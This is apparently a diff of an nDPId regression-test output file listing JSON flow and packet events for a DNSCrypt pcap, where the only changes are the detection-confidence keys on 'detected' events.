02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAXcFy4gAL0RDQ0KAAABPtK0R+AzBB0GBPVqByQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":22,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739299327} 
00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAABQFy4Aub0RMeAKAAABPtK0RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAXcFy8gAL0RDQwKAAABPtK0R9AzBB0GBAVtByIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":24,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739299327} 
00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":24,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAABQFy8Aub0RMd8KAAABPtK0RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739299355,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739299355,"pkt":"ZmZmZmZmRERERERECABFAADWguYAADURTls+0rRHCgAAAQQdxzwAwvgJByeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAD603DX03HFYUGSUUMZQ5AFHqQDCbcRbndp5mF3SVu19eScXuGrpg2nLc5WDzV06y+FJw+Dah4cv34QVXrvZ7Q8nY1y4iPNLnPDmhCiX6M9Qv8kZOhpPDs+tmijF9ICJLydjXLiI80ucXop2NF6KdjRga6m0"} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739299356,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739299356,"pkt":"ZmZmZmZmRERERERECABFAADWguUAADQRT1w+0rRHCgAAAQQdzZwAwvGtByOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAD603DX03HFYUGSUUMZQ5AFHqQDCbcRbndp5mF3SVu19eScXuGrpg2nLc5WDzV06y+FJw+Dah4cv34QVXrvZ7Q8nY1y4iPNLnPDmhCiX6M9Qv8kZOhpPDs+tmijF9ICJLydjXLiI80ucXop2NF6KdjRga6m0"} 
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAXcHPkgAL0RfJ0KAAABuYbEN9HBIPsGBAgHfxoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739304328,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":29,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739304328} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":29,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAABQHPkAub0RoXAKAAABuYbENwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304328,"flow_last_seen":946739304328,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739304328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":35005,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946739304328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739304328,"pkt":"REREREREZmZmZmZmCABFAAXcHPsgAL0RfJsKAAABuYbEN4i9IPsGBFEJfxwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydARyZG5zBmZhZWxpeANuZXQAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
